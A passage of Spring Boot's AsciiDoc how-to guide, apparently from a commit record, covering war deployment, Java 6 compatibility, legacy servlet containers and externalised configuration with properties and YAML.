to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` with a `manual` task that should work if you run it with\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nafter which you can run the application with\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-use-java-6]]\n=== How to use Java 6\nIf you want to use Spring Boot with Java 6 there are a small number of configuration\nchanges that you will have to make. The exact changes depend on your application's\nfunctionality.\n\n\n\n[[howto-use-java-6-embedded-container]]\n==== Embedded servlet container compatibility\nIf you are using one of Boot's embedded Servlet containers you will have to use a\nJava 6-compatible container. Both Tomcat 7 and Jetty 8 are Java 6 compatible. See\n<<howto-use-tomcat-7>> and <<howto-use-jetty-8>> for details.\n\n\n\n[[howto-use-java-6-jackson]]\n==== Jackson\nJackson 2.7 and later requires Java 7. If you want to use Jackson with Java 6 you\nwill have to downgrade to Jackson 2.6.\n\nSpring Boot uses the Jackson BOM that was introduced as of Jackson 2.7 so you can't just\noverride the `jackson.version` property. 
In order to use Jackson 2.6, you will have to\ndefine the individual modules in the `dependencyManagement` section of your build, check\nhttps:\/\/github.com\/{github-repo}\/blob\/0ffc7dc13f6de82c199a6d503354a88c7aaec2d9\/spring-boot-dependencies\/pom.xml#L523-L597[this\nexample] for more details.\n\n\n\n[[how-to-use-java-6-jta-api]]\n==== JTA API compatibility\nWhile the Java Transaction API itself doesn't require Java 7 the official API jar\ncontains classes that have been built to require Java 7. If you are using JTA then\nyou will need to replace the official JTA 1.2 API jar with one that has been built\nto work on Java 6. To do so, exclude any transitive dependencies on\n`javax.transaction:javax.transaction-api` and replace them with a dependency on\n`org.jboss.spec.javax.transaction:jboss-transaction-api_1.2_spec:1.0.0.Final`\n\n\n\n[[howto-traditional-deployment]]\n== Traditional deployment\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a deployable war file\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. This makes\nuse of Spring Framework's Servlet 3.0 support and allows you to configure your\napplication when it's launched by the servlet container. Typically, you update your\napplication's main class to extend `SpringBootServletInitializer`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) throws Exception {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration so that your project produces a war file\nrather than a jar file. If you're using Maven and using `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you) all you need to do is to modify `pom.xml` to change the\npackaging to war:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you're using Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container doesn't\ninterfere with the servlet container to which the war file will be deployed. To do so, you\nneed to mark the embedded servlet container dependency as provided.\n\nIf you're using Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nAnd if you're using Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nNOTE: If you are using a version of Gradle that supports compile only dependencies (2.12\nor later), you should continue to use `providedRuntime`. 
Among other limitations,\n`compileOnly` dependencies are not on the test classpath so any web-based integration\ntests will fail.\n\nIf you're using the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided will produce an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based example]\nof the above-described configuration.\n\n\n\n[[howto-create-a-deployable-war-file-for-older-containers]]\n=== Create a deployable war file for older servlet containers\nOlder Servlet containers don't have support for the `ServletContextInitializer` bootstrap\nprocess used in Servlet 3.0. You can still use Spring and Spring Boot in these containers\nbut you are going to need to add a `web.xml` to your application and configure it to load\nan `ApplicationContext` via a `DispatcherServlet`.\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an existing application to Spring Boot\nFor a non-web application it should be easy (throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`). Spring MVC web applications are generally amenable to first\ncreating a deployable war application, and then migrating it later to an executable war\nand\/or jar. Useful reading is in the http:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nCreate a deployable war by extending `SpringBootServletInitializer` (e.g. in a class\ncalled `Application`), and add the Spring Boot `@SpringBootApplication` annotation.\nExample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that whatever you put in the `sources` is just a Spring `ApplicationContext` and\nnormally anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working first.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. Same for `messages.properties` (Spring Boot\ndetects this automatically in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. 
If you have other features in your application, using other servlets or filters\nfor instance, then you may need to add some configuration to your `Application` context,\nreplacing those elements from the `web.xml` as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\n container as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (like a\n `<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\n your `Application`. Simple cases where annotation configuration is already heavily\n used can instead be recreated in a few lines as `@Bean` definitions.\n\nOnce the war is working we make it executable by adding a `main` method to our\n`Application`, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and the `main` method, something like:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntricks.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (e.g. if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to squash all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\nthat doesn't work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples.
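\n\nAs a rough sketch of keeping such a hierarchy (assuming hypothetical `ParentConfig` and\n`WebConfig` configuration classes from the application being converted), the fluent\nbuilder can register the parent sources and then a child web context:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ ParentConfig and WebConfig are placeholders for your own @Configuration classes\n\tnew SpringApplicationBuilder()\n\t\t.sources(ParentConfig.class)\t\/\/ the non-web root context\n\t\t.child(WebConfig.class)\t\t\/\/ the web context, which sees the parent's beans\n\t\t.run(args);\n----\n\n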
An existing parent context that contains web-specific features will usually\nneed to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to a Spring\nBoot application, and the guidance above might help, but your mileage may vary.\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic would be something like this:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.context.web.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use logback, you will also need to tell WebLogic to prefer the packaged version\nrather than the version that is pre-installed with the server. You can do this by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttp:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-servlet-2-5]]\n=== Deploying a WAR in an Old (Servlet 2.5) Container\nSpring Boot uses Servlet 3.0 APIs to initialize the `ServletContext` (register `Servlets`\netc.) so you can't use the same application out of the box in a Servlet 2.5 container.\nIt *is* however possible to run a Spring Boot application on an older container with some\nspecial tools. If you include `org.springframework.boot:spring-boot-legacy` as a\ndependency (https:\/\/github.com\/scratches\/spring-boot-legacy[maintained separately] to the\ncore of Spring Boot and currently available at 1.0.2.RELEASE), all you should need to do\nis create a `web.xml` and declare a context listener to create the application context and\nyour filters and servlets. The context listener is a special purpose one for Spring Boot,\nbut the rest of it is normal for a Spring application in Servlet 2.5.
Example:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<web-app version=\"2.5\" xmlns=\"http:\/\/java.sun.com\/xml\/ns\/javaee\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee http:\/\/java.sun.com\/xml\/ns\/javaee\/web-app_2_5.xsd\">\n\n\t\t<context-param>\n\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t<param-value>demo.Application<\/param-value>\n\t\t<\/context-param>\n\n\t\t<listener>\n\t\t\t<listener-class>org.springframework.boot.legacy.context.web.SpringBootContextLoaderListener<\/listener-class>\n\t\t<\/listener>\n\n\t\t<filter>\n\t\t\t<filter-name>metricsFilter<\/filter-name>\n\t\t\t<filter-class>org.springframework.web.filter.DelegatingFilterProxy<\/filter-class>\n\t\t<\/filter>\n\n\t\t<filter-mapping>\n\t\t\t<filter-name>metricsFilter<\/filter-name>\n\t\t\t<url-pattern>\/*<\/url-pattern>\n\t\t<\/filter-mapping>\n\n\t\t<servlet>\n\t\t\t<servlet-name>appServlet<\/servlet-name>\n\t\t\t<servlet-class>org.springframework.web.servlet.DispatcherServlet<\/servlet-class>\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextAttribute<\/param-name>\n\t\t\t\t<param-value>org.springframework.web.context.WebApplicationContext.ROOT<\/param-value>\n\t\t\t<\/init-param>\n\t\t\t<load-on-startup>1<\/load-on-startup>\n\t\t<\/servlet>\n\n\t\t<servlet-mapping>\n\t\t\t<servlet-name>appServlet<\/servlet-name>\n\t\t\t<url-pattern>\/<\/url-pattern>\n\t\t<\/servlet-mapping>\n\n\t<\/web-app>\n----\n\nIn this example we are using a single application context (the one created by the context\nlistener) and attaching it to the `DispatcherServlet` using an init parameter. This is\nnormal in a Spring Boot application (you normally only have one application context).\n","old_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' type of questions\nthat often arise when using Spring Boot. This is by no means an exhaustive list, but it\ndoes cover quite a lot.\n\nIf you are having a specific problem that we don't cover here, you might want to check out\nhttp:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer; this is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe're also more than happy to extend this section; if you want to add a '`how-to`' you\ncan send us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot application\n\n\n[[howto-failure-analyzer]]\n=== Create your own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\ninto a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such an analyzer for application-context-related exceptions, JSR-303\nvalidations and more. It is actually very easy to create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present.
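\n\nFor example, here is a minimal sketch that handles a hypothetical\n`UnsupportedDataSourceException` (the exception type and the messages are placeholders\nfor your own code):\n\n[source,java,indent=0]\n----\n\tpublic class UnsupportedDataSourceFailureAnalyzer\n\t\t\textends AbstractFailureAnalyzer<UnsupportedDataSourceException> {\n\n\t\t@Override\n\t\tprotected FailureAnalysis analyze(Throwable rootFailure,\n\t\t\t\tUnsupportedDataSourceException cause) {\n\t\t\t\/\/ Describe what went wrong and suggest a fix\n\t\t\treturn new FailureAnalysis(\n\t\t\t\t\t\"The configured data source is not supported: \" + cause.getMessage(),\n\t\t\t\t\t\"Review the 'spring.datasource.url' property.\", cause);\n\t\t}\n\n\t}\n----\n\n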
If for whatever reason you can't handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations are to be registered in a `META-INF\/spring.factories`:\nthe following registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot auto-configuration\nThe Spring Boot auto-configuration tries its best to '`do the right thing`', but\nsometimes things fail and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You will see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` there is also an `autoconfig` endpoint that renders the report\nin JSON. Use that to debug the application and see what features have been added (and\nwhich not) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. Some\nrules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources, in particular the\n `+@Conditional*+` annotations to find out what features they enable and when. Add\n `--debug` to the command line or a System property `-Ddebug` to get a log on the\n console of all the auto-configuration decisions that were made in your app. In a running\n Actuator app look at the `autoconfig` endpoint ('`\/autoconfig`' or the JMX equivalent) for\n the same information.\n* Look for classes that are `@ConfigurationProperties` (e.g.\n {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\n and read from there the available external configuration options. The\n `@ConfigurationProperties` has a `name` attribute which acts as a prefix to external\n properties, thus `ServerProperties` has `prefix=\"server\"` and its configuration properties\n are `server.port`, `server.address` etc. In a running Actuator app look at the\n `configprops` endpoint.\n* Look for use of `RelaxedPropertyResolver` to pull configuration values explicitly out of the\n `Environment`. It often is used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`. This is less\n flexible than the `RelaxedPropertyResolver` approach, but does allow some relaxed binding,\n specifically for OS environment variables (so `CAPITALS_AND_UNDERSCORES` are synonyms\n for `period.separated`).\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\n response to SpEL expressions, normally evaluated with placeholders resolved from the\n `Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext before it starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. 
There is more\nthan one way to register additional ones:\n\n* Programmatically per application by calling the `addListeners` and `addInitializers`\n methods on `SpringApplication` before you run it.\n* Declaratively per application by setting `context.initializer.classes` or\n `context.listener.classes`.\n* Declaratively for all applications by adding a `META-INF\/spring.factories` and packaging\n a jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (even\nsome before the context is created), and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n_<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>_ in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, this example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` will already have been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. This example adds the `custom-resource` property source at the\nend of the list so that a key defined in any of the usual other locations takes\nprecedence. A custom implementation may obviously define another order.\n\nNOTE: While using `@PropertySource` on your `@SpringBootApplication` seems convenient and\neasy enough to load a custom resource in the `Environment`, we do not recommend it as\nSpring Boot prepares the `Environment` before the `ApplicationContext` is refreshed. Any\nkey defined via `@PropertySource` will be loaded too late to have any effect on\nauto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext hierarchy (adding a parent or root context)\nYou can use the `SpringApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See _<<spring-boot-features.adoc#boot-features-fluent-builder-api>>_\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a non-web application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method, but also bootstrap a Spring application to set up\nthe infrastructure to use, then it's easy with the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class depending on whether it\nthinks it needs a web application or not. The first thing you can do to help it is to just\nleave the servlet API dependencies off the classpath. If you can't do that (e.g.
you are\nrunning 2 applications from the same code base) then you can explicitly call\n`setWebEnvironment(false)` on your `SpringApplication` instance, or set the\n`applicationContextClass` property (through the Java API or with external properties).\nApplication code that you want to run as your business logic can be implemented as a\n`CommandLineRunner` and dropped into the context as a `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties & configuration\n\n\n\n[[howto-automatic-expansion]]\n=== Automatically expand properties at build time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them using the existing build configuration\ninstead. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic property expansion using Maven\nYou can automatically expand properties from the Maven project using resource\nfiltering. If you use the `spring-boot-starter-parent` you can then refer to your\nMaven '`project properties`' via `@..@` placeholders, e.g.\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (i.e. no filtering is applied on\n`src\/test\/resources`).\n\nTIP: The `spring-boot:run` can add `src\/main\/resources` directly to the classpath\n(for hot reloading purposes) if you enable the `addResources` flag. This circumvents\nthe resource filtering and this feature. You can use the `exec:java` goal instead\nor customize the plugin's configuration, see the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you don't use the starter parent, in your `pom.xml` you need (inside the `<build\/>`\nelement):\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nand (inside `<plugins\/>`):\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you are using standard Spring\nplaceholders in your configuration (e.g. `${foo}`). These may be expanded by the build if\nthat property is not set to `false`.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic property expansion using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties via placeholders, e.g.\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine` which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. 
To use Spring property placeholders together with automatic expansion\nthe Spring property placeholders need to be escaped like `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the configuration of SpringApplication\nA `SpringApplication` has bean properties (mainly setters) so you can use its Java API as\nyou create the application to modify its behavior. Or you can externalize the\nconfiguration using properties in `+spring.main.*+`. E.g. in `application.properties` you\nmight have:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-environment=false\n\tspring.main.banner-mode=off\n----\n\nand then the Spring Boot banner will not be printed on startup, and the application will\nnot be a web application.\n\nNOTE: The example above also demonstrates how flexible binding allows the use of\nunderscores (`_`) as well as dashes (`-`) in property names.\n\nProperties defined in external configuration override the values specified via the Java\nAPI with the notable exception of the sources used to create the `ApplicationContext`. Let's\nconsider this application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nused with the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application will _now_ show the banner (as overridden by configuration) and use\nthree sources for the `ApplicationContext` (in that order): `demo.MyApp`, `com.acme.Config`,\n`com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the location of external properties of an application\nBy default properties from different sources are added to the Spring `Environment` in a\ndefined order (see _<<spring-boot-features.adoc#boot-features-external-config>>_ in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods, and those added using `setSources()` are inspected to see if they have\n`@PropertySources`, and if they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower priority than any added using the default locations (e.g.\n`application.properties`), system properties, environment variables or the command line.\n\nYou can also provide System properties (or environment variables) to change the behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`), defaults to `application` as the root of\n the file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`) is the file to load (e.g. a classpath\n resource or a URL). A separate `Environment` property source is set up for this document\n and it can be overridden by system properties, environment variables or the\n command line.\n\nNo matter what you set in the environment, Spring Boot will always load\n`application.properties` as described above.
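\n\nFor instance, a hypothetical invocation (the jar name and the location are placeholders)\nthat adds an extra document on top of the defaults might look like this:\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/override.properties\n----\n\n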
If YAML is used then files with the '`.yml`'\nextension are also added to the list by default.\n\nSpring Boot logs the configuration files that are loaded at `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`short`' command line arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can easily enable this by using\nplaceholders in `application.properties`, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you are inheriting from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (i.e.\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttp:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other delimiters].\n\nNOTE: In this specific case the port binding will work in a PaaS environment like Heroku\nand Cloud Foundry, since in those two platforms the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for external properties\nYAML is a superset of JSON and as such is a very convenient syntax for storing external\nproperties in a hierarchical format. E.g.\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and stick it in the root of your classpath, and\nalso add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis 1-level deep and has period-separated keys, a lot like people are used to with\n`Properties` files in Java.\n\nThe example YAML above corresponds to an `application.properties` file\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee _<<spring-boot-features.adoc#boot-features-external-config-yaml>>_ in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the active Spring profiles\nThe Spring `Environment` has an API for this, but normally you would set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`). 
